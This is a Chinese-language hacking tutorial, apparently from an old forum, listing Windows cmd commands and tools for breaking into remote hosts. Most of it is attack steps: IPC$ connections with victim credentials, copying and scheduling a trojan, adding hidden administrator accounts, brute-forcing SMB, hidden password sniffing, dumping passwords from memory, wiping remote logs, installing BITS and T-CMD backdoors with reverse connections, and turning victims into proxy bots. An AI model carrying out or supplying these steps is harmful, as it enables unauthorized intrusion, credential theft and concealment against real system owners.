一些常用的Net命令与例子：

（1）建立IPC连接的命令

Net use \\IP\ipc$ “” /user:username

例如：

Net use \\127.0.0.1\ipc$ 123456 /user :administrator

这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接

(2) 删除IPC$空连接

Net use \\ip /del

例如：

Net use \\127.0.0.1 /del

删除与主机127.0.0.1已经建立的Ipc$连接

(3) 启动关闭服务：

Net start //查看已经开启的服务

Net start servername

Net stop servername

例如：

Net start telnet //开启telnet服务

Net stop telnet //关闭telnet服务

(4)启动关闭共享

Net shate ipc$ //开启ipc$默认共享

Net share ipc$ /del //关闭ipc$默认共享

Net share c=c:\ //完全共享c盘

Net share d=d:\ //删除完全共享的d盘

(4) 映射硬盘

Net use z: \\ip\c$

例如：

Net use z: \\127.0.0.1\c$ //把127.0.0.1的C盘映射成本机的z盘

说明：映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！

Net use z: /del //断开映射

入侵中的作用：把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了

成功实现的条件：必须与对方建立ipc$连接

(5) 远程复制文件_Copy

Copy e:\3389.exe \\127.0.0.1\c$ \\将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下

Copy在入侵中的作用：把本地文件复制到对方硬盘

Copy复制成功所需的条件：必须与主机建立ipc$连接

(6) 查看远程系统的时间

Net time \\IP

Net time \\127.0.0.1 //查看远程主机127.0.0.1的本地时间

作用：得到对方时间好为自己计划任务种下木马做准备

(7) 远程运行程序

At \\ip time server.exe

At \\127.0.0.1 12:30 c:\server.exe \\让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe

在入侵中作用：这样我们就可以用我们的木马服务端来连接我们木马，，更好的使用图形方式来控制肉鸡.(推荐使用神气儿 ^_^)

（8）添加管理员帐号：

Net user juntuan 1234 /add \\添加一个密码为1234名字为 军团的用户

Net localgroup administrators juntuan /add \\把juntuan这个用户添加到管 理员组

注意：有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组还是administrators的。

修改用户密码：

Net user juntuan 1234 \\把用户juntuan的密码修改成1233。

（9）远程登陆主机_telnet

telnet IP port

例如：telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口

（当目标主机的端口是默认的23的时候我们不需要+端口即：telnet IP 就好）

（10）传输文件命令_ftp

其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢？

首先在CMD里面输入ftp

然后输入：open IP port

例如：open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口

如何开启windows系统自带的ftp服务：

Net start msftppsvc

(11) 查看文件夹的属性_cacls

Cacls xiaod //查看xiaod这个文件夹的属性

参数说明：F：（完全控制）R：（只读）C：（允许更改）W：（允许写入）N：（没有任何权限）

(12) 删除文件_del

Del是用来删除文件命令

首先进入你想删除的文件的目录

Del xiaod.txt //删除xiaod.txt这个个文件

Del xiaod.txt /f //强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）

(13) finger命令

Finger是一个信息刺探命令一般在对方开启了79端口时命令使用

Finger –l user @computer

参数详解： -l 用长列表格式显示消息

User:指定用户的信息

成功实现的条件：对方必须安装tcp/ip协议

(14)：文件写入命令_echo:

Echo 你好 > index.htm //用你好来覆盖index.htm的内容

Echo 你好 >>index.htm //将“你好”添加到index.htm

（15）：写入注册表文件_regedit

Regedit /s filename.reg //s是写入参数

(16)：端口映射_chgport

Chgport 3=5 //将端口3映射到5

Chgport /d* //删除所有端口映射

(17)：文件映射_subst

Subst b:\ c:\winnt \\这个时候当你访问硬盘B的时候你就是访问了 c:\winnt目录

(18)：查看当前正在使用的帐号：

Query session //查看帐号

(19)：踢掉指定用：

Logoff id //注意ID，是在用query session查看到的用户的id而不是用户名。

(20)：发送消息给某用户或者内网主机

Net send hostname or /IP message

例如：net send xiaod or /127.0.0.1 hello!

CMD的内部基本入侵命令讲解完毕，现在我们来讲讲他的外部命令，也就是借用外部DOS小工具的方法：

（二）CMD外部一部分小工具的使用方法：

(1) opentelnet：一个在得到对方用户名与密码的情况下远程开启对方telnet的程序

命令语法：opentelnet \\IP username pass ntml port

例 子：opentelnet \\127.0.0.1 administrator 1234 1 3800

开启主机127.0.0.1的telnet服务，并且端口设置在3800（当连接的时候就需要telnet 127.0.0.1 3800了）1是NTML的验证值，就是说，我们需要输入登陆用户名与密码才能登陆。

该命令成功实现的条件：对方没有装防火墙，并且IPC$服务开启

telnet.vbe：一个不基于IPC$是否开启直接开telnet的工具

命令语法：cscript telnet.vbe 127.0.0.1 username pass ntml port

这个与上面哪个opentelnet的使用含义是一样的

该命令成功实现的条件：对方没有装防火墙

（2）Pslist：查看系统进程的工具

Pskill：杀除系统进程的工具

进入工具目录直接输入：pslist即可以查看系统进程如下图：

图中用红色标注的就是PID列表：

Pskill pid如下图片：

显然1560是conime的进程，已经被杀了。

（3）fport：一个查看系统程序所对应的端口的工具

使用方法如下图：

(4)：远程删除日志：

Cleanlog.vbe

命令语法：

Cscript cleanlog.vbe IP username pass system –all //删除系统日志

Cscript cleanlog.vbe IP username pass application –all //删除应用程序日志

Cscript cleanlog.vbe IP username pass secutity –all //删除安全日志

使用的优势：无须对方开启ipc$共享

(5)：远程开启关闭重启主机：

Reboot.vbe

Cscript Reboot.vbe IP username pass –r //重启目标主机

Cscript Reboot.vbe IP username pass –s //关闭目标主机

Cscript Reboot.vbe IP username pass –I //注销目标当前用户

Cscript Reboot.vbe IP username pass –p //关闭目标电源

使用的优势：无须对方开启ipc$共享

(6)：端口重定rinetd and fpipe

首先说说rinetd的使用

首先我们配置一个文件juntuan.txt

juntuan.txt内容如下：

IP1 21 IP2 3389 //释：IP1是主机IP IP2是要接受的内网主机IP，既整个命令的意思是当你连接IP1主机（公网IP）的21端口的时候，主机一（IP1）会把他21端口接收到数据发到内网主机（IP2）的3389。也就是你连接IP1主机的21端口，实际上就是连接IP2的3389端口。

命令：rinetd.exe –c juntuan.txt

工具2：fpipe

使用命令：fpipe –v –l 53 s 53 –r 23 主机IP

例子：fpipe –l 80 –s 90 –r 80 127.0.0.1

释：将本机的80端口接收到的数据通过本机的90端口直接转发到127.0.0.1的80端口

(7)：SNMP弱口令的利用：

工具：Snmputil

Snmputil [get|getnext|walk]agent id //语法格式

Snmputil walk 127.0.0.1 xiaod.1.3.6.1.4.1.77.1.2.25.1.5 \\查询帐户

Snmputil walk 对方IP public.1.3.6.1.2.1.25.4.2.1.2 \\查询系统进程

Snmputil walk 对方IP public.1.3.6.1.4.1.77.1.2.25.1.1 \\查询用户列表

Snmputil walk 对方IP public .1.3.6.1.2.1.1 \\列出对方系统信息

该工具的作用：查询一部分系统而已

我个人这个没有很大的作用，查看到了系统信息，要攻破还是需要运气

(8)：暴力破解系统密码

Smbcrack

Smbcrack IP username 字典路径 端口

释：首先你需要用字典自己做一个字典，用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的，端口可以是139、137、445系统开启的NETBOIS协议端口就可以！

(9)：小巧的嗅叹器_xsniff

Xsniff是一个小巧的嗅叹器，可以嗅叹UDP/TCP协议的信息

使用语法：

Xsniff –pass –hide –log c:\pass.log –pass

c:\pass.log 是保存记录文件，建议选择一个深的目录，可以自定义

性能参数：

-hide 隐藏在后台运行 -log：生成嗅叹的日志文档

Pass.log:嗅叹的日志文档文档名，可以自定义

-TCP：捕获TCP数据包

-UDP：捕获UDP数据包

-ICMP：捕获ICMP数据包

-HOST：主机名或IP地址

-PORT：指定端口嗅叹

-ASC输出出时保存为ASCII格式

(10)：SFIND 命令行扫描器

例子：

Sfind –p 3389 192.168.10.1 192.168.10.255

扫描192.168.10.1段的1-255主机的3389端口

Sfind –cgi 192.168.10.1 //扫描192.168.10.1的cgi漏洞

Sfind –ftp 192.168.10.1 //扫描192.168.10.1的ftp漏洞

Sfind –idq 192.168.10.1 //扫描192.168.10.1的idg漏洞

(11)：克隆帐号CA：

CA.EXE \\IP administrator “” guest 123

将GUEST帐号克隆成管理员

Administrator 的密码为空用”” guest的密码是123

(12)：后门使用：

这里我介绍小榕的bits

说明：BITS必须放在system32目录下才可以安装

安装命令：rundll32.exe BITS.dll install rasato juntuan //指定后门特征为juntuan

连接激活：

正向连接（用nc连接即可）：juntuan:@IP[xell]:99

反向连接:juntuan:@IP[rxell]:yourIP:port

卸载：rundll32.exe BITS.dll uninstall

同时也介绍T-CMD

安装命令：

t-cmd –install

然后：telnet IP 20540

就可以了，T-CMD是菜鸟的好选择

(13)：系统密码查看_showpass

直接进入showpass的目录直接运行showpass只要当前用户在线，那么showpass就可以把他的密码从内存里找出来。

(14)：代理肉鸡的制作_SK

安装命令：

sk.exe –install //安装SK

sk.exe -config port 4999 //设置端口为4999

sk.exe -config starttype 2 //设置启动项为自启动

net start skserver //启动SK代理服务

(15)：SQL弱口令利用

我本来在这里不想说这个，但是希望大家能够综合利用所以我就直接说了。（SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描，这个是我的朋友SHANLU的写的，强烈推荐大家使用他，同时也希望辞去工作的SHANLU现在已经找到一份好工作）

Sqlexeca.exe IP sa “’

因为是弱口令，所以用””表示，同时也告诉大家SQL服务器的最高权限帐户是SA，这个是不能更改的！

（16）：终端服务的开启与使用

这个恐怕就是菜鸟门最喜欢的话题了一个图形话的交互界面

工具：3389.exe 3389.vbe 3389.bat

方法一：3389.exe：只需要把此文件复制到你所要开启的服务器运行此程序就可以了。

方法二：3389.vbe：这个是一个脚本文件，使用方法如下：

Cscript 3389.vbe IP username pass port /r //密码必须是管理员密码 port是终端的端口，这个是可以自己定义的，参数.r是说明开启成功自动重启动服务器！你也可以使用/fr，FR的意思就是强制重新启动服务器！

方法三：3389.bat：这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考，3389.bat的内容如下：

echo [components] > d:\xiaopang

echo tsenable=on >> d:\xiaopang



sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\xiaopang /q

大家可以把上述代码保存一个bat然后放到要开3389的服务器上，在CMD下运行，服务器的3389就开启了。

终端的连接：

这里推荐使用2003或者XP的终端登陆器，如图：



然后系统会提示你输入帐号与密码，输入以后直接登陆就可以了

ＤＯＳ下执行＂chkdsk 　／r"命令来修复！

ＤＯＳ下执行＂chkdsk 　／r"命令来修复！